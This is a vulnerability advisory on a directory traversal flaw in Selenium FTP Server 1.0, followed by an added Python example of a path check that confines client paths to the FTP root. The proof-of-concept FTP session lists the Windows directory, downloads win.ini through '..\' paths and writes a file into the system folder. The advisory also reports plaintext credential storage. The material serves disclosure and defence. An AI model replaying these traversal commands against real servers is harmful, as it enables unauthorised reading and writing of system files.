Selenium FTP Server is vulnerable to a directory traversal input validation error: a remote unauthenticated user can use the DIR, LIST, NLST, etc. commands to display any file on the remote server, use the GET/RECV command to retrieve any file outside the FTP root, and use the PUT/SEND command to write to any location on the remote server.
Credit:
The information has been provided by Greg Linares.
Vulnerable Systems:
* Selenium FTP Server version 1.0
Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe
-rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe
-rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe
-rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe
-rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe
-rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe
-rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe
-rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe
-rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe
-rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE
-rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe
-rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe
-rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe
-rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe
-rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe
-rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe
-rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.
Furthermore, the software improperly writes any username/password that might be used to log in to the program in plaintext to the file[s] stored in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium Server\Servers.
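
The kind of path check whose absence allows the traversal in the proof of concept above, as an added example (not code from the advisory or from Selenium FTP Server). The FTP root C:\ftproot and the names resolve_in_root, audit and PathEscape are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any host OS

FTP_ROOT = r"C:\ftproot"  # assumed FTP root; the advisory does not name one

class PathEscape(ValueError):
    """Client-supplied path resolves outside the FTP root."""

def resolve_in_root(root, cwd, client_path):
    """Map an FTP path argument to a Windows path under root, or raise.
    cwd is the virtual directory (a single backslash is the FTP root)."""
    # NUL truncates paths in some APIs; ':' would allow drive letters
    # and NTFS alternate data streams.
    if "\x00" in client_path or ":" in client_path:
        raise PathEscape(client_path)
    path = client_path.replace("/", "\\")
    # A leading separator means "FTP root", never the drive root.
    virtual = path if path.startswith("\\") else cwd + "\\" + path
    # Stripping leading separators also defuses UNC forms (\\host\share).
    candidate = ntpath.normpath(ntpath.join(root, virtual.lstrip("\\")))
    # Compare after collapsing ".." and case-folding, on a component boundary
    # so that C:\ftproot-old does not pass as C:\ftproot.
    base = ntpath.normcase(ntpath.normpath(root))
    cand = ntpath.normcase(candidate)
    if cand != base and not cand.startswith(base + "\\"):
        raise PathEscape(client_path)
    # String checks do not see junctions or symlinks; a real server should
    # also resolve the final path on disk before opening it.
    return candidate

def audit(args, root=FTP_ROOT, cwd="\\"):
    """Return {argument: resolved path, or None if rejected}."""
    results = {}
    for arg in args:
        try:
            results[arg] = resolve_in_root(root, cwd, arg)
        except PathEscape:
            results[arg] = None
    return results

# Path arguments taken from the proof-of-concept session above.
POC_ARGS = [r"\windows", r"\windows\*.exe",
            r"..\windows\win.ini", r"..\windows\toobad.txt"]

if __name__ == "__main__":
    for arg, resolved in audit(POC_ARGS).items():
        print(f"{arg!r:28} -> {resolved or 'REJECTED'}")
```

With this check, the two DIR arguments are confined to a windows folder under the FTP root instead of the drive root, and both ..\ arguments used with GET and PUT are rejected.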